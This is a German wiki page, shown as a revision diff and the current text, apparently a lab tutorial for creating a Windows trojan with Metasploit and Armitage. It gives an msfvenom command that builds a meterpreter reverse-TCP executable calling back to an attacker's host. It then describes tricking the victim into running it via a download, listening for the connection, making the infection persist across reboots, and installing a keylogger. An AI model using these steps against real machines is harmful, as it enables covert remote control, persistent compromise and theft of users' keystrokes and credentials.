Metasploit & armitage trojaner: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
Zeile 10: Zeile 10:
 
=Trojaner erstellen=
 
=Trojaner erstellen=
 
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe
 
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe
 +
 
[[Datei:7 trojaner.png]]
 
[[Datei:7 trojaner.png]]
 
=dem opfer das programm unterschieben=
 
=dem opfer das programm unterschieben=
 
das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an
 
das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an
 +
 
[[Datei:8 opfer.png]]
 
[[Datei:8 opfer.png]]
 +
 
auf der opfer seite
 
auf der opfer seite
 +
 
[[Datei:12 schadeware.png]]
 
[[Datei:12 schadeware.png]]
 
=kontrolle übernehmen=
 
=kontrolle übernehmen=
 +
 
nun starten wier erst meta sploit und danach arimtage
 
nun starten wier erst meta sploit und danach arimtage
 +
 
[[Datei:1 armitage starten]]
 
[[Datei:1 armitage starten]]
 +
 
wenn armitage gestarte ist erstellne wier einen server zum luaschen
 
wenn armitage gestarte ist erstellne wier einen server zum luaschen
 
*payload
 
*payload
 
**windows
 
**windows
 
***metapreter
 
***metapreter
 +
 
hier passen wir den LPORT an
 
hier passen wir den LPORT an
  
Zeile 34: Zeile 42:
  
 
wir suchen nach persists und geben einen neuen port an
 
wir suchen nach persists und geben einen neuen port an
 +
 
[[Datei:200persist.png]]
 
[[Datei:200persist.png]]
 +
 
wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden
 
wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden
  

Version vom 23. August 2016, 13:56 Uhr

setup Hacker

Kali linux
ip:  192.168.242.91

setup Opfer

Windows 7 domaine rechner
Benutzer: Admin
ip:  192.168.242.76

Trojaner erstellen

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe

7 trojaner.png

dem opfer das programm unterschieben

das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an

8 opfer.png

auf der opfer seite

12 schadeware.png

kontrolle übernehmen

nun starten wier erst meta sploit und danach arimtage

Datei:1 armitage starten

wenn armitage gestarte ist erstellne wier einen server zum luaschen

  • payload
    • windows
      • metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer computer

Dauerhaft infizieren

als nächstes wollen wier den trojaner dauerhaft speichern

wir suchen nach persists und geben einen neuen port an

200persist.png

wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden

diese kann ein par minuten dauern

Was kann man machen

jetzt gibt es viele möglichkeiten

  • rechtsklick infizierter pc
    • meterpreter
      • explore

hier können wir uns Prozesse oder dateien anzeigen lassen andere Prozesse infizieren oder einen keyloger installieren usw

kurz Beispiel key loger

auf dem rechten seite schauen wier live in die datei in der wir mitschneiden

auf der linken seite ist der infizierte windows rechner

400 keyloger.png